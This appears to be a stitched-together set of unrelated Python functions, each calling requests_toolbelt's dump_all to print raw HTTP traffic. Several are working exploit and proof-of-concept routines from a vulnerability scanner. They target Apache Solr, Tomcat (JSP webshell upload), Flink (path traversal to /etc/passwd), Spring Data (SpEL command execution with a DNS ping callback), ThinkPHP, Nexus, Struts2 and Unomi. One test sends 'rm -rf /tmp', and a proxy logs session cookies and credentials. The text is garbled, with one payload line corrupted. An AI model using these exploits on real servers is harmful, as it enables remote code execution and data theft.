def _log_response(self, response, message): try: if response.status_code == requests.codes.ok or response.status_code >= requests.codes.server_error: self._logger.info("[{}] {} | {} {}".format(response.request.method, message, response.status_code, response.reason)) else: self._logger.error("[{}] {} | {} {} ({})".format(response.request.method, message, response.status_code, response.reason, response.json()["errors"])) self._logger.debug("DUMP:\n{}".format(dump.dump_all(response).decode("utf-8"))) except (UnicodeDecodeError, JSONDecodeError) as e: self._logger.debug("DUMP:\nImpossible to decode.")
def send(*args, **kw): response = real_send(*args, **kw) from requests_toolbelt.utils import dump data = dump.dump_all(response) for line in data.splitlines(): try: line = line.decode('utf-8') except UnicodeDecodeError: line = bytes(line) print(line) return response
def cve_20210408_filereading(self): self.pocname = 'Apachesolr:CVE_20210408' self.method = 'get' self.rawdata = 'null' self.info = '[file readind]' self.r = "PoCWating" self.path = '/solr/{}/debug/dump?param=ContentStreams&stream.url=file://{}' self.data = r'' self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*' } try: if self.VULN == 'False': self.request = requests.get( self.url + self.path.format(self.corename, '/etc/passwd'), data=self.data, headers=self.headers, timeout=self.TIMEOUT, verify=False) self.rawdata = dump.dump_all(self.request).decode( 'utf-8', 'ignore') if r"root" in self.request.text or r"系统找不到" in self.request.text: self.r = 'PoCSuCCeSS' verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info, self.env) else: verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env) else: self.request = requests.get( self.url + self.path.format(self.corename, self.CMD), data=self.data, headers=self.headers, timeout=self.TIMEOUT, verify=False) verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env) except requests.exceptions.Timeout as error: verify.timeout_output(self.pocname) except requests.exceptions.ConnectionError as error: verify.connection_output(self.pocname) except Exception as error: verify.error_output(str(error), self.pocname)
def on_click(self): """ クリック時 """ r = self.communicate() rawstr = dump.dump_all(r) self.inside('raw_TextView.raw').setPlainText(rawstr.decode('utf-8')) self.inside('response_HeadView.status').clear() if r.status_code == 200: path = save_history(rawstr, r) self.inside('response_HeadView.status').setText(r.headers['X-Vcc-Api-Queue-Status'])
def swift_head(host='127.0.0.1', port='7480', cmd='/', subuser='', secret_key='',show_dump = False): ''' swift head ''' url = 'http://%s:%s%s' % (host, port, cmd) serverurl = '%s:%s' % (host, port) X_Auth_Token = swift_auth(serverurl, subuser=subuser, secret_key=secret_key) headers = {'x-auth-token': X_Auth_Token} response = requests.head(url, headers=headers) if show_dump: data = dump.dump_all(response) print(data.decode('utf-8')) else: print response.content
def post_allocations(allocations, algorithm_id=6): url = _baseurl + 'post_allocations' data = {**auth_args, **{ 'allocations': allocations, 'algorithm_id': algorithm_id }} # POST request r = requests.post(url, json=data) data = dump.dump_all(r) # Return 'success' or status code if r.status_code == 200: return "success" else: return "There was a problem: " + str(r.status_code)
def saveRequest(req): debug_dir = 'debug_data/%s/' % datetime.now().strftime('%d-%m-%Y') if not os.path.exists(debug_dir): os.makedirs(debug_dir) raw_http = dump.dump_all(req).decode('UTF-8') file_name = '%s.gz' % Encode(req.url) with gzip.open(debug_dir + file_name, 'wb') as f: f.write(raw_http.encode('UTF-8')) Log('GZip request saved as "%s"' % file_name) return True
def test_create_user_with_incorrect_data(key, value, error, param_json, url): with allure.step('копируем данные в json'): data = deepcopy(param_json) data[key] = value with allure.step( 'отправляем рост запрос на создание пользователя с некорректными данными' ): r = requests.post(url, json=data) json = r.json() with allure.step('ассертим результат'): assert r.status_code == 400 assert error in json['error'] data = dump.dump_all(r) allure.attach(data.decode('utf-8'), response.text, type='html')
def proxy_post(request): """ To act as a proxy for POST requests from Phenotips note: exempting csrf here since phenotips doesn't have this support """ try: # print type(pickle.loads(request.session['current_phenotips_session'])) # re-construct proxy-ed URL again url, parameters = __aggregate_url_parameters(request) project_name = request.session['current_project_id'] uname, pwd = get_uname_pwd_for_project(project_name) curr_session = pickle.loads(request.session['current_phenotips_session']) logger.info("===> POSTING to url: " + url) logger.info("===> DATA: " + str(dict(request.POST))) logger.info("===> SESSION - headers: " + str(curr_session.headers)) logger.info("===> SESSION - cookies: " + str(curr_session.cookies)) logger.info("===> SESSION - auth: " + str(curr_session.auth)) import requests #response = requests.post(url, headers=curr_session.headers, cookies=curr_session.cookies, auth=curr_session.auth) response = curr_session.post(url, data=dict(request.POST)) from requests_toolbelt.utils import dump data = dump.dump_all(response) logger.info("===> dump - original:\n" + data.decode('utf-8')) http_response = HttpResponse(response.content) for header in response.headers.keys(): if header != 'connection' and header != 'Transfer-Encoding': # these hop-by-hop headers are not allowed by Django http_response[header] = response.headers[header] # persist outside of PhenoTips db as well if len(request.POST) != 0: patient_id = request.session['current_patient_id'] __process_sync_request_helper(patient_id, request.user, project_name, parameters, pickle.loads(request.session['current_phenotips_session']) ) logger.info("===> original api - HTTP RESPONSE DICT: ") for k,v in http_response.__dict__.items(): logger.info("===> %s: %s" % (k,v)) return http_response except Exception as e: print 'proxy post error:', e logger.error('phenotips.views:' + str(e)) raise Http404
def cve_2019_17558_exp(self, cmd): vul_name = "Apache Solr: CVE-2019-17558" core_name = None payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd) url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except AttributeError: pass url_api = self.url + "/solr/" + str(core_name) + "/config" headers_json = { 'Content-Type': 'application/json', 'User-Agent': self.ua } set_api_data = """ { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } } """ request = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False) request = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers, timeout=self.timeout, verify=False) raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2017_12615_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Tomcat: CVE-2017-12615" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache Tomcat PUT 方法任意文件上传" self.vul_info["vul_numb"] = "CVE-2017-12615" self.vul_info["vul_apps"] = "Tomcat" self.vul_info["vul_date"] = "2017-09-20" self.vul_info["vul_vers"] = "7.0.0 - 7.0.81" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "任意文件上传" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache Tomcat如果开启PUT方法支持则可能存在远程代码执行漏洞,漏洞编号为CVE-2017-12615。" \ "攻击者可以在使用该漏洞上传JSP文件,从而导致远程代码执行。" self.vul_info["cre_date"] = "2021-01-21" self.vul_info["cre_auth"] = "zhzyker" self.name = random_md5() key = random_md5() self.webshell = "/" + self.name + ".jsp/" self.payload1 = key self.payload2 = self.payload_cve_2017_12615 try: self.request = requests.put(self.url + self.webshell, data=self.payload1, headers=self.headers, timeout=self.timeout, verify=False) self.request = requests.get(self.url + self.webshell[:-1], headers=self.headers, timeout=self.timeout, verify=False) if key in self.request.text: self.vul_info["vul_data"] = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = self.url + "/" + self.name + ".jsp" self.vul_info[ "prt_info"] = "[url: " + self.url + "/" + self.name + ".jsp ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2020_17519_poc(self): # 2021-01-07 self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Flink: CVE-2020-17519" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info[ "vul_payd"] = "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" self.vul_info["vul_name"] = "Apache Flink 任意文件读取" self.vul_info["vul_numb"] = "CVE-2020-17519" self.vul_info["vul_apps"] = "Flink" self.vul_info["vul_date"] = "2021-01-05" self.vul_info["vul_vers"] = "1.5.1 - 1.11.2" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "任意文件读取" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Flink部分版本(1.11.0, 1.11.1, 1.11.2)中存在该漏洞,允许攻击者通过JobManager进程的REST " \ "API,读取JobManager本地文件系统上的任意文件。访问仅限于JobManager进程可访问的文件。" self.vul_info["cre_date"] = "2021-01-07" self.vul_info["cre_auth"] = "zhzyker" self.pocname = self.vul_info["prt_name"] self.rawdata = None self.info = "null" self.method = "get" self.r = "PoCWating" self.poc = "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" try: self.request = requests.get(self.url + self.poc, headers=self.headers, timeout=self.timeout, verify=False) if r"root:x:0:0:root:/root:/bin/bash" in self.request.text and r"daemon:" in self.request.text: self.vul_info["vul_data"] = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[url: " + self.url + self.poc + " ]" verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: print(e) verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def on_click(self): """ クリック時 """ r = self.communicate() rawstr = dump.dump_all(r) self.inside('raw_TextView.raw').setPlainText(rawstr.decode('utf-8')) self.inside('response_HeadView.status').clear() if r.status_code == 200: path = save_history(rawstr, r) self.inside('response_HeadView.status').setText( r.headers['X-Vcc-Api-Queue-Status'])
def on_click(self): """ クリック時 """ r = self.communicate() rawstr = dump.dump_all(r) self.inside('raw_TextView.raw').setPlainText(rawstr.decode('utf-8')) self.inside('response_TreeView.view').clear() if r.status_code == 200: path = save_history(rawstr, r) data = r.json() widget = self.inside('response_TreeView.view') self.set_response_TreeView_columnset(widget, "root", data)
def execute_experiment(self, data, content_type='application/json'): headers = { 'Content-type': content_type, } payload = json.dumps(data) response = requests.post(tacc_constants.EXPERIMENT_AUTHENTICATION_URL + self._execution_token, headers=headers, data=payload) if response.status_code != HTTPStatus.OK: output_data = dump.dump_all(response) self.logger.error(output_data.decode('utf-8')) return {} return response.json()
def saveRequest(url, req): debug_dir = 'debug_data/%s/' % datetime.now().strftime('%d-%m-%Y') if not os.path.exists(debug_dir): os.makedirs(debug_dir) raw_http = '< Target URL: "%s"\r\n\r\n' % url raw_http += dump.dump_all(req).decode('UTF-8') file_name = '%s.gz' % uuid.uuid4().hex with gzip.open(debug_dir + file_name, 'wb') as f: f.write(raw_http.encode('UTF-8')) Log('GZip request saved as "%s"' % file_name) return True
def cve_2019_7238(self): self.pocname = "Nexus Repository Manager: CVE-2019-7238" self.payload = self.payload_cve_2019_7238.replace( "RECOMMAND", self.CMD) self.method = "post" self.rawdata = "null" self.info = CodeTest.Colored_.rce() self.headers = { 'Accept': '*/*', 'User-agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)', 'Content-Type': 'application/json' } try: if CodeTest.VULN == None: self.request = requests.get(self.url, headers=self.headers, timeout=TIMEOUT, verify=False) self.nexus_ver = re.findall(r'/(.*)-', self.request.headers['Server'])[0] self.nexus_num = self.nexus_ver.replace(".", "") self.nexus_n = int(self.nexus_num) if self.nexus_n >= 362 and self.nexus_n <= 3140: self.r = "PoCSuCCeSS" self.info += " [ver:" + self.nexus_ver + "]" CodeTest.verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info) else: self.request = requests.post(self.url + "/service/extdirect", data=self.payload, headers=self.headers, timeout=TIMEOUT, verify=False) self.rawdata = dump.dump_all(self.request).decode( 'utf-8', 'ignore') CodeTest.verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info) except requests.exceptions.Timeout as error: CodeTest.verify.timeout_output(self.pocname) except requests.exceptions.ConnectionError as error: CodeTest.verify.connection_output(self.pocname) except Exception as error: CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
def send_token(verification_email, email_function): VerificationToken.query.filter( VerificationToken.email_id == verification_email.id).update( {VerificationToken.expired: True}) token = generate_token() verification_token = save_verification_token(verification_email.id, token) email_response = email_function(verification_email.email, token) email_log = dump.dump_all(email_response).decode('utf-8') verification_token.email_log = email_log return save(verification_token)
def s2_032(self): self.pocname = "Apache Struts2: S2-032" self.payload = self.payload_s2_032.replace("RECOMMAND",self.CMD) self.method = "get" self.rawdata = "null" self.info = PocType_.rce() try: self.request = requests.get(self.url+self.payload, headers=headers, timeout=self.TIMEOUT, verify=False) self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore') verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info, self.env) except requests.exceptions.Timeout as error: verify.timeout_output(self.pocname) except requests.exceptions.ConnectionError as error: verify.connection_output(self.pocname) except Exception as error: verify.error_output(str(error), self.pocname)
def test_uploadfile_n(self, payload): headers = {'Content-type': 'application/json'} mandatory_header_key = 'File-Path' response = requests.post( self.server + f"/file", data=payload, headers=headers) body = response.json() print(dump.dump_all(response)) self.assertEqual(response.status_code, 500) self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.HTTP_HEADER_NOT_PROVIDED.value) % mandatory_header_key) self.assertEqual(body.get('version'), self.expected_version) self.assertEqual(body.get('code'), ApiCode.HTTP_HEADER_NOT_PROVIDED.value) self.assertIsNotNone(body.get('timestamp'))
def Get(url): try: if random_Agents: headers['User-agent'] = ua.random r = get(url, allow_redirects=allow_redirects, cookies=cookies, headers=headers, timeout=Timeout, proxies=proxy, verify=False) if Dump: print(dump.dump_all(r).decode('utf-8')) return r except: return 0
def gettosalfeld(url, withuser=True, debug=True): with requests.Session() as s: l = s.post('https://portal.salfeld.net/api/login/', json=payload) json = l.json() auth = {'X-sessionId': json['sessionID'], 'X-pcId': json['pcId']} if withuser: response = s.get('https://portal.salfeld.net/api/{}/{}'.format( User, url), headers=auth) else: response = s.get('https://portal.salfeld.net/api/{}'.format(url), headers=auth) if debug: data = dump.dump_all(response) print(data.decode('utf-8')) return response.json()
def test_executecommand_rm_allowed_p(self): command = "rm -rf /tmp" response = requests.post( self.server + f"/command", data=command) body = response.json() print(dump.dump_all(response)) self.assertEqual(response.status_code, 200) self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value)) self.assertIsInstance(body.get('description'), dict) self.assertEqual(body.get('version'), self.expected_version) self.assertEqual(body.get('code'), ApiCode.SUCCESS.value) self.assertIsNotNone(body.get('timestamp'))
def s2_devMode(self): self.pocname = "Apache Struts2: S2-devMode" self.method = "get" self.rawdata = "null" self.info = CodeTest.Colored_.rce() self.payload = self.payload_s2_devMode.replace("RECOMMAND",self.CMD) try: self.request = requests.get(self.url+self.payload, headers=headers, timeout=TIMEOUT, verify=False, allow_redirects=False) self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore') CodeTest.verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info) except requests.exceptions.Timeout as error: CodeTest.verify.timeout_output(self.pocname) except requests.exceptions.ConnectionError as error: CodeTest.verify.connection_output(self.pocname) except Exception as error: CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
def cve_2018_1273_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞" self.vul_info["vul_numb"] = "CVE-2018-1273" self.vul_info["vul_apps"] = "Spring" self.vul_info["vul_date"] = "2018-04-11" self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程命令执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \ "攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。" self.vul_info["cre_date"] = "2021-01-26" self.vul_info["cre_auth"] = "zhzyker" md = random_md5()[:-20] cmd = "ping " + md + "." + self.ceye_domain payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = payload self.vul_info[ "prt_info"] = "[ceye] [rce] [payload: " + payload + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2019_9082_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "ThinkPHP: CVE-2019-9082" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2019_9082.replace( "RECOMMAND", "whoami") self.vul_info["vul_name"] = "ThinkPHP5 5.0.23 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2019-9082" self.vul_info["vul_apps"] = "ThinkPHP" self.vul_info["vul_date"] = "2018-12-11" self.vul_info["vul_vers"] = "< 3.2.4" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "ThinkPHP prior to 3.2.4, as used in Open Source BMS v1.1.1 and other products, " \ "allows Remote Command Execution via public//?s=index/\think\app/invokefunction" \ "&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command." self.vul_info["cre_date"] = "2021-01-29" self.vul_info["cre_auth"] = "zhzyker" self.pocname = "ThinkPHP: " md = random_md5() cmd = "echo " + md self.payload = self.payload_cve_2019_9082.replace("RECOMMAND", cmd) self.method = "get" self.rawdata = "null" bad = "20" + md try: self.request = requests.get(self.url + self.payload, headers=self.headers, timeout=self.timeout, verify=False) if md in self.request.text: if bad not in self.request.text: self.vul_info["vul_data"] = dump.dump_all( self.request).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def proxy_post(request): """ To act as a proxy for POST requests from Phenotips note: exempting csrf here since phenotips doesn't have this support """ try: # print type(pickle.loads(request.session['current_phenotips_session'])) # re-construct proxy-ed URL again url, parameters = __aggregate_url_parameters(request) project_name = request.session['current_project_id'] uname, pwd = get_uname_pwd_for_project(project_name) curr_session = pickle.loads( request.session['current_phenotips_session']) logger.info("===> POSTING to url: " + url) logger.info("===> DATA: " + str(dict(request.POST))) logger.info("===> SESSION - headers: " + str(curr_session.headers)) logger.info("===> SESSION - cookies: " + str(curr_session.cookies)) logger.info("===> SESSION - auth: " + str(curr_session.auth)) import requests #response = requests.post(url, headers=curr_session.headers, cookies=curr_session.cookies, auth=curr_session.auth) response = curr_session.post(url, data=dict(request.POST)) from requests_toolbelt.utils import dump data = dump.dump_all(response) logger.info("===> dump - original:\n" + data.decode('utf-8')) http_response = HttpResponse(response.content) for header in response.headers.keys(): if header != 'connection' and header != 'Transfer-Encoding': # these hop-by-hop headers are not allowed by Django http_response[header] = response.headers[header] # persist outside of PhenoTips db as well if len(request.POST) != 0: patient_id = request.session['current_patient_id'] __process_sync_request_helper( patient_id, request.user, project_name, parameters, pickle.loads(request.session['current_phenotips_session'])) logger.info("===> original api - HTTP RESPONSE DICT: ") for k, v in http_response.__dict__.items(): logger.info("===> %s: %s" % (k, v)) return http_response except Exception as e: print 'proxy post error:', e logger.error('phenotips.views:' + str(e)) raise Http404
def s3_put(host='127.0.0.1', port='7480', cmd='/', access_key='', secret_key='', headers=None, file=None, content=None, show_dump=False): ''' put request use aws2 ''' if headers: headers = json.loads(headers) url = 'http://%s:%s%s' % (host, port, cmd) response = None if file: with open(file, 'rb') as fin: file_content = fin.read() #upload object from file response = requests.put(url, auth=S3Auth(access_key, secret_key, service_url=host + ":" + port), headers=headers, data=file_content) elif content: #upload object from content response = requests.put(url, auth=S3Auth(access_key, secret_key, service_url=host + ":" + port), headers=headers, data=content) else: # create bucket response = requests.put(url, auth=S3Auth(access_key, secret_key, service_url=host + ":" + port), headers=headers) if show_dump: data = dump.dump_all(response) print(data.decode('utf-8')) else: print response.content
def tempusFindProjectName(TempusProjectName): try: #Get Project Name and then the Swag value urlIncludeParams = urlTempusFindProjectName + '?name=' urlIncludeParams += TempusProjectName urlIncludeParams += "&page=1&pageSize=10" u = requests.get(urlIncludeParams, headers=headersTempus) data = dump.dump_all(u) print(data.decode('utf-8')) if u.status_code == 200: #need the json response value #(parse the value below next, could be multiple rows returned that match the startsWith) #{"page":1,"pageSize":10,"totalItems":2,"items":[{"createdOn":"2017-08-25T12:36:00.1877869","createdBy":{"resourceId":835,"systemActor":null},"updatedOn":"2017-08-25T12:36:00.1877869","updatedBy":{"resourceId":835,"systemActor":null},"startDate":"2017-08-24T00:00:00","endDate":"2017-10-08T00:00:00","securityGroupId":1,"id":555,"name":"Dell Networking"},{"createdOn":"2017-08-25T13:30:10.513793","createdBy":{"resourceId":835,"systemActor":null},"updatedOn":"2017-08-25T13:30:10.513793","updatedBy":{"resourceId":835,"systemActor":null},"startDate":"2017-08-24T00:00:00","endDate":"2017-09-08T00:00:00"," nameMatch = false entityId = 0 e = json.loads(u.text) for key, value in e.iteritems(): if key == 'items': myItemsList = value print("myItemList = ", myItemsList) z = 0 for s in myItemsList: print("s={0}, i={1}".format(s, z)) for key, value in s.items(): z = z + 1 if key == 'name': #accounting for more than one match of the name print("project name now = {0}".format(value)) if TempusProjectName == value: print( "value of project name matches {0} vs {1}" .format(TempusProjectName, value)) nameMatch = true #return entityId if key == 'id': print("found id") print("id = {0}".format(value)) entityId = value print("entityId = {0}".format(entityId)) if nameMatch == true: return entityId else: print('failed to locate project in Tempus = %s' % TempusProjectName) except ConnectionError as theError: print(theError) return -1
def cve_2019_7238_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Nexus Repository Manager: CVE-2019-7238" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Nexus Repository Manager 3 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2019-7238" self.vul_info["vul_apps"] = "Nexus" self.vul_info["vul_date"] = "2019-03-21" self.vul_info["vul_vers"] = "3.6.2 - 3.14.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能," \ "而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞" self.vul_info["cre_date"] = "2021-01-27" self.vul_info["cre_auth"] = "zhzyker" md = random_md5() cmd = "echo " + md self.payload = self.payload_cve_2019_7238.replace("RECOMMAND", cmd) self.headers = { 'Accept': '*/*', 'User-agent': self.ua, 'Content-Type': 'application/json' } try: request = requests.post(self.url + "/service/extdirect", data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) if md in request.text: self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = cmd self.vul_info["prt_info"] = "[rce] [payload: " + cmd + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2020_10199_exp(self, cmd, u, p): vul_name = "Nexus Repository Manager: CVE-2020-10199" self.session_headers = { 'Connection': 'keep-alive', 'X-Requested-With': 'XMLHttpRequest', 'X-Nexus-UI': 'true', 'User-Agent': self.ua } try: self.us = base64.b64encode(str.encode(u)) self.pa = base64.b64encode(str.encode(p)) self.base64user = self.us.decode('ascii') self.base64pass = self.pa.decode('ascii') self.session_data = { 'username': self.base64user, 'password': self.base64pass } self.request = requests.post(self.url + "/service/rapture/session", data=self.session_data, headers=self.session_headers, timeout=20) self.session_str = str(self.request.headers) self.session = (re.search(r"NXSESSIONID=(.*); Path", self.session_str).group(1)) self.rce_headers = { 'Connection': "keep-alive", 'NX-ANTI-CSRF-TOKEN': "0.6153568974227819", 'X-Requested-With': "XMLHttpRequest", 'X-Nexus-UI': "true", 'Content-Type': "application/json", '404': "" + cmd + "", 'User-Agent': self.ua, 'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520;" \ "NX-ANTI-CSRF-TOKEN=0.6153568974227819; NXSESSIONID=" + self.session + "" } request = requests.post(self.url + "/service/rest/beta/repositories/go/group", data=self.payload_cve_2020_10199, headers=self.rce_headers) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def get(self, *args, **kwargs): rsp = self.session.get(*args, **kwargs) data = dump.dump_all(rsp) try: # python 2 # self.logger.debug(unicode(bytes(data), errors='ignore')) # python 3 # py3 uses system default EOL (end of line) character # In windows, it is \r\n, and the dumped data has characters '\r\n', and it will # automatically changed to \r\r\n when writing to the file. # So we need call an additional replace to fix the problem. data_str = str(bytes(data), encoding='utf-8', errors='ignore').replace('\r\n', '\n') self.logger.debug(data_str) except: self.logger.debug(data) return rsp
def cve_2020_13942(self): self.pocname = "Apache Unomi: CVE-2020-13942" self.method = "post" self.rawdata = "null" self.info = CodeTest.Colored_.rce() self.r = "PoCWating" self.payload = self.payload_cve_2020_13942.replace( "RECOMMAND", self.CMD) self.headers = { 'Host': '34.87.38.169:8181', 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", 'Accept': '*/*', 'Connection': 'close', 'Content-Type': 'application/json' } try: self.request = requests.post(self.url + "/context.json", data=self.payload, headers=self.headers, timeout=TIMEOUT, verify=False) self.rawdata = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.rep = list( json.loads(self.request.text) ["trackedConditions"])[0]["parameterValues"]["pagePath"] if CodeTest.VULN == None: if r"/tracker/" in self.rep: self.r = "PoCSuSpEct" CodeTest.verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info) else: self.r = "Command Executed Successfully (But No Echo)" CodeTest.verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info) except requests.exceptions.Timeout as error: CodeTest.verify.timeout_output(self.pocname) except requests.exceptions.ConnectionError as error: CodeTest.verify.connection_output(self.pocname) except Exception as error: CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
def get_api_token(self): resp = requests.post(self.token_url, data={'response_type': 'token', 'grant_type': 'password', 'username': self.client_key, 'password': self.client_secret, 'client_id': self.client_id, 'redirect_uri': self.callback_url}, verify=False) if self.debug: data = dump.dump_all(resp) print(data.decode('utf-8')) if resp.status_code == 401: print('Error: {}'.format(resp.json()['error_description'])) return None return resp.json()['access_token']
def on_click(self): """ クリック時 """ r = self.communicate() rawstr = dump.dump_all(r) print r.headers['Content-Type'] try: self.inside('raw_TextView.raw').setPlainText(rawstr.decode('utf-8')) except Exception as e: print str(e) #self.inside('response_GetView.widget').deleteLater() if r.status_code == 200: print "content-length : %s" % len(r.content) self.content_view(rawstr, r.headers['Content-Type'], r)
def test_dump_all(self): session = requests.Session() recorder = get_betamax(session) with recorder.use_cassette('redirect_request_for_dump_all'): response = session.get('https://httpbin.org/redirect/5') arr = dump.dump_all(response) assert b'< GET /redirect/5 HTTP/1.1\r\n' in arr assert b'> Location: /relative-redirect/4\r\n' in arr assert b'< GET /relative-redirect/4 HTTP/1.1\r\n' in arr assert b'> Location: /relative-redirect/3\r\n' in arr assert b'< GET /relative-redirect/3 HTTP/1.1\r\n' in arr assert b'> Location: /relative-redirect/2\r\n' in arr assert b'< GET /relative-redirect/2 HTTP/1.1\r\n' in arr assert b'> Location: /relative-redirect/1\r\n' in arr assert b'< GET /relative-redirect/1 HTTP/1.1\r\n' in arr assert b'> Location: /get\r\n' in arr assert b'< GET /get HTTP/1.1\r\n' in arr
def debugRequest(self, req): try: print (dump.dump_all(req).decode('utf-8')) except: pass
